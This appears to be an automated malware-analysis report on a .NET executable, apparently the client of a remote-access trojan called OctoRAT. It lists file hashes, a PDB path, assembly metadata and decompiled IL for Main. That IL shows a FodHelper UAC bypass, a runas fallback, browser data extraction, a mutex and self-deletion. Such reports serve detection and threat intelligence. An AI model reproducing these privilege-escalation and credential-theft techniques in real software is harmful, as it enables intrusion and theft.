5922a1adc691970e850e406a18bfec57
PE Executable | MD5: 5922a1adc691970e850e406a18bfec57 | Size: 420.86 KB | application/x-dosexec
Symbol Obfuscation Score

| Hash | Hash Value |
|---|---|
| MD5 | 5922a1adc691970e850e406a18bfec57 |
| Sha1 | 10986a370ffcb3dfd4cc07bdf7b7d8fb18cf5e0d |
| Sha256 | 70a06f67fc7478f77ba341fbbe10aaaa00cafc06dcd948c3e623914d4a5e2c35 |
| Sha384 | 399e26f5d15a1331f9125b7130d5ada8fa4fac23fa69b9e02bf5bdab4be6349ea78ed4bf7d2cc353c5053916d56bddab |
| Sha512 | fc55690d30d0ec3410a850a5047a13f739983d80a289b8418d434c7ecc325d9863348f5ea504ba166b3c976b11a38f8b3b0d84f816ce232d5f4fb261697789cb |
| SSDeep | 6144:VPJiQz7AGn4oXNJA91sL59j17WimTvpqBZi4PjAuMofwa50qHY9bHLMgdMN5A:2QzLnXA9qLJ7WFm/jT50ty5A |
| TLSH | 6B94D69067F94604F2FF2F79A9B245114A76BC93AC35D34E098694DE0EB3B81DC21B63 |

| Name | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\sulum\OneDrive\Desktop\server\server\stubCsharp\obj\Release\Client.pdb |
| Module Name | Client.exe |
| Full Name | Client.exe |
| EntryPoint | System.Void Client.Program::Main(System.String[]) |
| Scope Name | Client.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Client |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 3558 |
| Main Method | System.Void Client.Program::Main(System.String[]) |
| Main IL Instruction Count | 116 |
| Main IL | call System.Void BrowserDataExtractor.iamfine::EnsureBouncyCastleDLL() ldstr [{0:yyyy-MM-dd HH:mm:ss}] === RMM Client Starting === call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::IsRunningElevated() brtrue IL_0131: ldc.i4.1 call System.String Client.ResourceReader::GetConfig() stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> ldloc.1 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_005E: ldloc.2 ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 124 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.3 <null> ldloc.3 <null> ldlen <null> conv.i4 <null> ldc.i4.5 <null> blt.s IL_005E: ldloc.2 ldloc.3 <null> ldc.i4.4 <null> ldelem.ref <null> ldstr true call System.Boolean System.String::op_Equality(System.String,System.String) stloc.2 <null> ldloc.2 <null> brfalse IL_0118: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges" ldstr [{0:yyyy-MM-dd HH:mm:ss}] Not running as admin, attempting FodHelper UAC bypass... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::BypassUACFodHelper() brfalse.s IL_00A8: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas..." ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass successful, process will restart elevated call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldc.i4 3000 call System.Void System.Threading.Thread::Sleep(System.Int32) ret <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.s V_4 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldloc.s V_4 callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldstr runas callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> leave IL_018A: ret pop <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass failed, continuing without elevation call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0131: ldc.i4.1 ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldc.i4.1 <null> ldstr OctoRAT_Client_Mutex_{B4E5F6A7-8C9D-0E1F-2A3B-4C5D6E7F8A9B} ldloca.s V_0 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.s V_5 ldloc.0 <null> brtrue.s IL_0145: nop leave.s IL_018A: ret nop <null> call System.Void Client.Program::Initialize() call System.Void Client.Program::Run() leave.s IL_018A: ret stloc.s V_6 ldstr Fatal error: ldloc.s V_6 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void Client.Program::WriteLog(System.String) leave.s IL_018A: ret call System.Void Client.Program::Cleanup() ldsfld System.Boolean Client.Program::meltEnabled brfalse.s IL_017D: endfinally call System.Void Client.Program::SelfDelete() endfinally <null> ldloc.s V_5 brfalse.s IL_0189: endfinally ldloc.s V_5 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null> |